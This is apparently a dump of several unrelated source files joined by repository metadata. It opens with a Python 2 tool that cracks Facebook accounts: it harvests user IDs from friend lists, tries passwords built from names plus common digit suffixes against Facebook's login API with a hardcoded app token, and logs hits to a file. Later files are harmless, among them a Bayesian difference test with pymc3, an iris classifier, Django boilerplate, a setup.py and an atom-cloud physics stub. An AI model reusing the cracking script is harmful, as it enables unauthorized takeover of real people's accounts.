idt = raw_input("\033[1;96m[+] \033[1;37mEnter ID Code \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mFriend Name\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mFriend List Public Nahi Hain!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mSearching ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print "\033[1;96m•◈•───────────────•◈•\033[1;92mFATIMA*ALI\033[1;96m•◈•───────────────•◈•"
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mInput Name file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Nai Milli'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill In Correctly"
pilih_super()
print "\033[1;96m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
time.sleep(0.05)
jalan('\033[1;96m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
time.sleep(0.05)
print
print('\x1b[1;96m[!] \033[1;92mStop CTRL+z')
time.sleep(0.05)
print "\033[1;96m•◈•───────────────•◈•\033[1;92mAZHAR*BALOCH\033[1;96m•◈•───────────────•◈•"
print ('\033[1;96m[\033[1;92mO\033[1;93mR\033[1;96m] \033[1;93m User ID \033[1;96m| \033[1;93mPassword \033[1;96m - \033[1;93m ID Name')
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1 + ' - ' + b['name']
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['last_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2 + ' - ' + b['name']
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3 + ' - ' + b['name']
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['last_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4 + ' - ' + b['name']
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name']+'1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5 + ' - ' + b['name']
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name']+'1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6 + ' - ' + b['name']
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = b['first_name']+'786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7 + ' - ' + b['name']
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
else:
pass8 = b['last_name']+'786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8 + ' - ' + b['name']
oks.append(user+pass8)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass8+"\n")
cek.close()
cekpoint.append(user+pass8)
else:
pass9 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass9 + ' - ' + b['name']
oks.append(user+pass9)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass9 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass9+"\n")
cek.close()
cekpoint.append(user+pass9)
else:
pass10 = b['last_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass10)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass10 + ' - ' + b['name']
oks.append(user+pass10)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass10 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass10+"\n")
cek.close()
cekpoint.append(user+pass10)
else:
pass11 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass11)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass11 + ' - ' + b['name']
oks.append(user+pass11)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass11 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass11+"\n")
cek.close()
cekpoint.append(user+pass11)
else:
pass12 = ('000786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass12)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mOK\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass12 + ' - ' + b['name']
oks.append(user+pass12)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCP\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass12 + ' - ' + b['name']
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass12+"\n")
cek.close()
cekpoint.append(user+pass12)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;96m•◈•───────────────•◈•\033[1;92mALEY*KASHAN\033[1;96m•◈•───────────────•◈•"
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Complete \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
if __name__ == '__main__':
login()
|
[
"[email protected]"
] | |
60b4bc818f8aeec5c6472c707d341e83ee9e4bab
|
d43de3e1133190f3e18803fd6046459bb0553b38
|
/best_test.py
|
8d4a62a7111849fcc3f06b491ffe7e64826abbb2
|
[
"MIT"
] |
permissive
|
mkazmier/best-test
|
5274d9848347581c7b9527d8f973f29b5a32807f
|
d1d8897055f543da7ec67cb579ca9092604cdb56
|
refs/heads/master
| 2021-07-07T11:33:35.070691 | 2017-10-03T11:00:28 | 2017-10-03T11:00:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,385 |
py
|
import pymc3 as pm
class BayesianDifferenceTest:
"""Perform a Bayesian test for difference of means and standard deviations between two samples.
Inspired by the classic BEST paper by Kruschke.
"""
def __init__(self, param_a_name, param_b_name, mu_mean, mu_sd, sd_lower, sd_upper, nu_mean):
"""Initialize the test.
Parameters
----------
param_a_name, param_b_name : str
Names for the tested parameters.
mu_mean, mu_sd : float
Mean and standard deviation of the prior on mean.
        sd_lower, sd_upper : float
            Lower and upper bounds of the prior on standard deviation.
nu_mean : float
The mean of the prior on normality (aka 'degrees of freedom').
"""
self.param_a_name = param_a_name
self.param_b_name = param_b_name
self.mu_mean = mu_mean
self.mu_sd = mu_sd
self.sd_lower = sd_lower
self.sd_upper = sd_upper
self.nu_mean = nu_mean
self._varnames = {
'mean_param_a': '{}_mean'.format(self.param_a_name),
'mean_param_b': '{}_mean'.format(self.param_b_name),
'sd_param_a' : '{}_sd'.format(self.param_a_name),
'sd_param_b' : '{}_sd'.format(self.param_b_name),
'nu' : 'nu',
'diff_means' : 'difference_of_means',
'diff_sds' : 'difference_of_sds'
}
def _build_model(self, observed_a, observed_b):
self.model = pm.Model()
with self.model as model:
# normal priors for means
mean_param_a = pm.Normal(self._varnames['mean_param_a'], self.mu_mean, self.mu_sd)
mean_param_b = pm.Normal(self._varnames['mean_param_b'], self.mu_mean, self.mu_sd)
            # uniform priors for the standard deviations
sd_param_a = pm.Uniform(self._varnames['sd_param_a'], self.sd_lower, self.sd_upper)
sd_param_b = pm.Uniform(self._varnames['sd_param_b'], self.sd_lower, self.sd_upper)
            # shifted exponential prior for normality (aka 'degrees of freedom')
nu = pm.Exponential(self._varnames['nu'], 1 / self.nu_mean) + 1
            # the data is assumed to come from a Student's t distribution, since it models data with outliers well;
            # it is not related to Student's t test in this case
# pymc3 uses precision instead of sd for Student's t
lambda_param_a = sd_param_a ** -2
lambda_param_b = sd_param_b ** -2
data_param_a = pm.StudentT('data_param_a', nu=nu, mu=mean_param_a, lam=lambda_param_a, observed=observed_a)
data_param_b = pm.StudentT('data_param_b', nu=nu, mu=mean_param_b, lam=lambda_param_b, observed=observed_b)
diff_means = pm.Deterministic(self._varnames['diff_means'], mean_param_a - mean_param_b)
diff_sds = pm.Deterministic(self._varnames['diff_sds'], sd_param_a - sd_param_b)
def run(self, observed_a, observed_b, nsamples=2000, njobs=1):
"""Run the inference on the model.
Parameters
----------
observed_a, observed_b : array-like
The observed data for the test.
nsamples : int, optional
The number of samples for MCMC (default 2000).
njobs : int, optional
the number of concurrent processes to use for sampling (default 1).
"""
self._build_model(observed_a, observed_b)
with self.model as model:
self.trace = pm.sample(nsamples, njobs=njobs)
def plot_posterior(self, varnames=None, ref_val=None):
"""Generate informative plots form the trace.
Parameters
----------
varnames : iterable of str or None, optional
The model variables to generate plots for (default None).
If None, defaults to all variables.
ref_val: int or float or None, optional
The value to use as reference on the plots (default None).
Generally only relevant for posteriors on differences of means
and standard deviations. For example, if ref_val = 0, a bar will
be placed on the posterior plot at a point corresponding to
zero difference in parameters. If this bar lies within the 95% HPD,
then it is likely that there is no significant difference between
the parameters.
"""
varnames = varnames or self.model_variables
pm.plot_posterior(self.trace, varnames=varnames, ref_val=ref_val, color='#8BCAF1')
def forestplot(self, varnames=None):
"""Generate a forestplot with 95% credible intervals and R hat statistic.
Parameters
----------
varnames : iterable of str or None, optional
The model variables to generate plots for (default None).
If None, defaults to all variables.
"""
varnames = varnames or self.model_variables
pm.forestplot(self.trace, varnames=varnames, color='#8BCAF1')
def traceplot(self):
"""Generate a traceplot for MCMC diagnostics."""
pm.traceplot(self.trace)
def summary(self, varnames=None):
"""Generate summary statistics for model as Pandas dataframe.
Parameters
----------
varnames : iterable of str or None, optional
The model variables to generate summaries for (default None).
If None, defaults to all variables.
Returns
-------
summary : pandas.DataFrame
The dataframe with summary statistics.
"""
varnames = varnames or self.model_variables
return pm.df_summary(self.trace, varnames=varnames)
@property
def model_variables(self):
"""Get model variables.
Returns
-------
varnames : list of str
The names of model variables.
"""
return list(self._varnames.values())
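

if __name__ == "__main__":
    # Minimal usage sketch, assuming numpy is available and using two synthetic
    # samples purely to show the call sequence; the prior bounds below are
    # illustrative, not recommended defaults.
    import numpy as np

    a = np.random.normal(1.0, 1.0, size=50)  # synthetic sample A
    b = np.random.normal(1.2, 1.0, size=50)  # synthetic sample B
    test = BayesianDifferenceTest("a", "b", mu_mean=1.0, mu_sd=2.0,
                                  sd_lower=0.01, sd_upper=10.0, nu_mean=30)
    test.run(a, b, nsamples=2000)
    print(test.summary())
    test.plot_posterior(varnames=["difference_of_means"], ref_val=0)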
|
[
"[email protected]"
] | |
8a2f3e9208b69376adaa77424ffcaf983fc436f6
|
c3d4a88e8a5d97b6cd45382161aa3565f822526e
|
/pythonapp/intellihistory/apps.py
|
415a45ab3dd29eef316fda7b8966e98ae83500fa
|
[
"MIT"
] |
permissive
|
ashna111/intelli-history
|
69bde4110b3ae0152557951bf16bb2f10098d077
|
23ea8f7260f64b6dfe2b6cf095bd29e757f546ae
|
refs/heads/master
| 2020-05-30T12:19:28.972576 | 2019-08-17T19:15:55 | 2019-08-17T19:15:55 | 189,729,000 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 103 |
py
|
from django.apps import AppConfig
class IntellihistoryConfig(AppConfig):
name = 'intellihistory'
|
[
"[email protected]"
] | |
8c3039935e219d19bd45140590f6d01a01c5aee8
|
6bc40cc640b56d0c66a784289a72d9dce78df517
|
/src/sst/selftests/test_two_methods.py
|
e7a5a9135380ad8e2db47f9c48012405f49fc715
|
[
"Apache-2.0"
] |
permissive
|
Work4Labs/selenium-simple-test
|
2cad968582b6f9491bc842d4d08a5dcd67d321e6
|
9bebc85b783c9566a23d383ba5a9be434efbec85
|
refs/heads/master
| 2020-12-24T14:01:44.712125 | 2016-04-29T18:19:25 | 2016-04-29T18:19:25 | 9,199,948 | 6 | 2 | null | 2016-02-03T02:02:31 | 2013-04-03T16:56:04 |
Python
|
UTF-8
|
Python
| false | false | 181 |
py
|
from sst.actions import *
from sst import runtests
class TestBoth(runtests.SSTTestCase):
def test_one(self):
assert True
def test_two(self):
assert True
|
[
"[email protected]"
] | |
eaaa199710e402820402eb1c34822f07205426bd
|
2586b1b0de8671db58db1940b955470035565fc3
|
/scikit_flower_1.py
|
b3c65e504a12897623ae67ab328bbdc9d44ba235
|
[] |
no_license
|
ivantay2003/flowerml
|
faab42723a9972a99dd10ea849bb6db2f2494e1b
|
898102a3931c5864eaa5cc6b0b0cf74f0963f482
|
refs/heads/master
| 2022-01-09T03:19:18.579187 | 2019-07-22T02:31:39 | 2019-07-22T02:31:39 | 198,132,242 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,395 |
py
|
from sklearn.datasets import load_iris
from sklearn.datasets import load_digits
import numpy as np
from sklearn import tree
import seaborn as sns
from sklearn.metrics import accuracy_score
digital = load_digits()
iris = load_iris()
print (iris.target_names)
iris_target = iris.target
iris_data = iris.data
sns.boxplot(data = iris_data,width=0.5,fliersize=5)
sns.set(rc={'figure.figsize':(1,10)})
sns.despine(offset=10, trim=True)
#print (digital.target)
iris_test_ids = np.random.permutation(len(iris_data))#randomly splitting the data set
#splitting and leaving last 15 entries for testing, rest for training
print ("iris_test_ids " + str(iris_test_ids))
iris_train_one = iris_data[iris_test_ids[:-15]]
iris_test_one = iris_data[iris_test_ids[-15:]]
iris_train_two = iris_target[iris_test_ids[:-15]]
iris_test_two = iris_target[iris_test_ids[-15:]]
iris_classify = tree.DecisionTreeClassifier()#using the decision tree for classification
iris_classify.fit(iris_train_one, iris_train_two) #training or fitting the classifier using the training set
iris_predict = iris_classify.predict(iris_test_one) #making predictions on the test dataset
print ("iris_predict :" + str (iris_predict)) #lables predicted (flower species)
print ("iris_test_two: " + str (iris_test_two))#actual labels
print ("accuracy_score : " + str (accuracy_score(iris_predict, iris_test_two)*100)) #accuracy metric
|
[
"[email protected]"
] | |
9876632e6db6b195c0bdd9d1e585ff36112b7603
|
f4cfcd20522b6db90cfb22c83892574a159ec609
|
/setup.py
|
ccfe83665c0b8095b5f1b0a81956c34d03b6a4c7
|
[
"MIT"
] |
permissive
|
rituraj254/simple-linear-regression-1
|
3f81eb78899b9d852d700c0f92d4707b4d66ec44
|
5f147ae0850aba6658a9fba707f132c76d61cb3b
|
refs/heads/main
| 2023-07-13T02:10:14.223667 | 2021-08-25T18:05:15 | 2021-08-25T18:05:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,519 |
py
|
import io
import os
import sys
from shutil import rmtree
from typing import Tuple, List
from setuptools import Command, setup
# Package meta-data
name = "simple-linear-regression_python"
description = "Simple Linear Regression in Python"
url = "https://github.com/drnitinmalik/simple-linear-regression"
email = "[email protected]"
author = "Nitin Malik"
requires_python = ">=3.0.0"
current_dir = "os.path.abspath(os.path.dirname(__file__))"
def get_long_description():
base_dir = os.path.abspath(os.path.dirname(__file__))
with io.open(os.path.join(base_dir, "README.md"), encoding="utf-8") as f:
return f.read()
class UploadCommand(Command):
description = "Build and publish the package"
user_options: List[Tuple] = []
@staticmethod
def status(s):
"""Print things in bold."""
print(s)
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status("Removing previous builds...")
rmtree(os.path.join(current_dir, "dist"))
except OSError:
pass
self.status("Building distribution...")
os.system(f"{sys.executable} setup.py sdist bdist_wheel --universal")
self.status("Uploading the package to PyPI via Twine...")
os.system("twine upload dist/*")
self.status("Pushing git tags...")
os.system("git tag v{}".format(about["__version__"]))
os.system("git push --tags")
sys.exit()
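# Hedged sketch: as pasted, this module defines UploadCommand but never calls
# setup(), so the command is not registered anywhere. A typical registration
# (field values reuse the metadata above) would look like:
#
#   setup(
#       name=name,
#       description=description,
#       long_description=get_long_description(),
#       url=url,
#       author=author,
#       author_email=email,
#       python_requires=requires_python,
#       cmdclass={"upload": UploadCommand},  # enables `python setup.py upload`
#   )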
|
[
"[email protected]"
] | |
62e27de6af0b88d2d51e7df695b6b24b7bacf167
|
cdcbfae0fda98917bd18e14f72d92aa801af6f74
|
/class_samples/2-5_userinput/input.py
|
458781cb83dfcfd849cc1795497ba15c19112881
|
[] |
no_license
|
BiradaterA/lps_compsci
|
e67c5ef68f81035290383903b78adf48e45e9689
|
f058043d14b71e62e5a9d0e70841711de5ebbe78
|
refs/heads/master
| 2020-12-24T12:00:40.576839 | 2017-04-30T22:57:47 | 2017-04-30T22:57:47 | 73,103,783 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 395 |
py
|
# First one for hw
print("How old are you?")
age = int(raw_input()) + 10
print("In ten years you will be " + str(age) + " years old")
# Second one
print("How much does it cost you for a coke?")
price = raw_input()
print("How many Cokes will you drink today?")
amount = raw_input()
x = int(price) * int(amount)
print("Wow, you're going to spend " + str(x) + " dollars on sugar water today!")
|
[
"[email protected]"
] | |
327f5bed18063bc5103443d55e4856bea69453da
|
009c5522fe7fd1b6ffad167097535e592818c9d7
|
/app/inheritance/abstract/migrations/0003_auto_20191223_0545.py
|
02758dcc786385764c2036954dc49dd6a0eb3c57
|
[] |
no_license
|
moorekwon/django-document
|
d891d3d329bc697598517c0918e912da89cf5f6a
|
983de2babdabd106e17467af27bac4efced170b8
|
refs/heads/master
| 2021-09-29T00:37:04.647977 | 2019-12-26T09:07:55 | 2019-12-26T09:07:55 | 228,784,209 | 0 | 0 | null | 2021-09-22T18:10:05 | 2019-12-18T07:35:12 |
Python
|
UTF-8
|
Python
| false | false | 740 |
py
|
# Generated by Django 3.0 on 2019-12-23 05:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('abstract', '0002_childa_childb'),
]
operations = [
migrations.AlterField(
model_name='childa',
name='m2m',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='abstract_childa_set', to='abstract.Student'),
),
migrations.AlterField(
model_name='childb',
name='m2m',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='abstract_childb_set', to='abstract.Student'),
),
]
|
[
"[email protected]"
] | |
bf36f0bfeb79d182b6f679f3ce2fbef7ca0f037e
|
153e2356d4101516459488309613f5097b9365a8
|
/week6 - Сортировка/week6 - Результаты олимпиады.py
|
4e139e3e0311dc6e985deb1030a1d00076b393aa
|
[] |
no_license
|
MariaZork/Coursera-Python-Course
|
bd9500d0f705d74e1a13c6dcd2d9b65f7a4fa712
|
316f1cbdc90cb5cf903e17eaa68f27bc9cb26a09
|
refs/heads/master
| 2021-09-06T12:28:56.922695 | 2018-02-06T14:35:21 | 2018-02-06T14:35:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,764 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 12 02:28:36 2017
@author: Maria
"""
# N people took part in an olympiad. Each received a certain number of
# points, and it turned out that every participant had a different score.
# Sort the list of olympiad participants in descending order of points scored.
# Input format
# The program receives the number of olympiad participants N. Then follow N
# lines, each containing a participant's surname and then, separated by a
# space, the number of points they scored.
# Output format
# Print the list of participants (surnames only) in descending order of
# points scored.
# Test 1
# Input:
# 3
# Ivanov 15
# Petrov 10
# Sidorov 20
#
# Program output:
# Sidorov
# Ivanov
# Petrov
#
# Test 2
# Input:
# 3
# Ivanov 15
# Petrov 20
# Sidorov 10
#
# Program output:
# Petrov
# Ivanov
# Sidorov
#
# Test 3
# Input:
# 3
# Ivanov 10
# Petrov 15
# Sidorov 20
#
# Program output:
# Sidorov
# Petrov
# Ivanov
N = int(input())
MyList = []
for i in range(N):
Tmp = input().split()
Surname = Tmp[0]
Score = int(Tmp[1])
T = (Surname, Score)
MyList.append(T)
MyList.sort(key=lambda Index: Index[1], reverse=True)
for i in range(0, len(MyList)):
    print(MyList[i][0])  # one surname per line, matching the expected output above
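# Equivalent sort-and-print ending (a sketch) using operator.itemgetter instead
# of a lambda:
#
#   from operator import itemgetter
#   for surname, score in sorted(MyList, key=itemgetter(1), reverse=True):
#       print(surname)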
|
[
"[email protected]"
] | |
2025f4ef19b96e9e2c5913d82afced71108eca7c
|
bab7fb81d6297f4afb6828c9b25d2e0cb89ef81d
|
/Atom_cloud.py
|
62f24a7ba93c81f5c1cbadf916840d5f387e2bdb
|
[] |
no_license
|
ollieennis1966/Group-Studies-
|
99739c58bb6efae0d25facf4e42b2e77d75e7cc9
|
ecf0f07c8cf141745fa4b7572fe7b42ec6753ed3
|
refs/heads/master
| 2021-01-02T20:33:43.693835 | 2020-02-13T21:55:28 | 2020-02-13T21:55:28 | 239,789,349 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,617 |
py
|
from Vector import Vector
import numpy as np
import matplotlib.pyplot as plt
import random
from math import sqrt, pi, exp, log10, sin, cos
class Cloud:
def __init__(self, Temp_0 = 1e-5, N = int(1e4), diameter = 1e-3):
"""
Initial conditions of the atom cloud: i.e. at time t = 0 when the MOT is turned off.
Assumptions: no interatomic collisions, cloud is uniform.
Initial radius, spatial and velocity distributions and temperature.
"""
hbar = 1.055e-34 # Planck's reduced constant
c = 3e8 # Speed of light in a vacuum
k = 1.38e-23 # Boltzmann constant
M = 1.443e-25 # Mass of Rb-87 atom
mean_velocity = sqrt((8*k*Temp_0)/(pi*M)) # Mean atom speed
radius = diameter/2 # Cloud radius
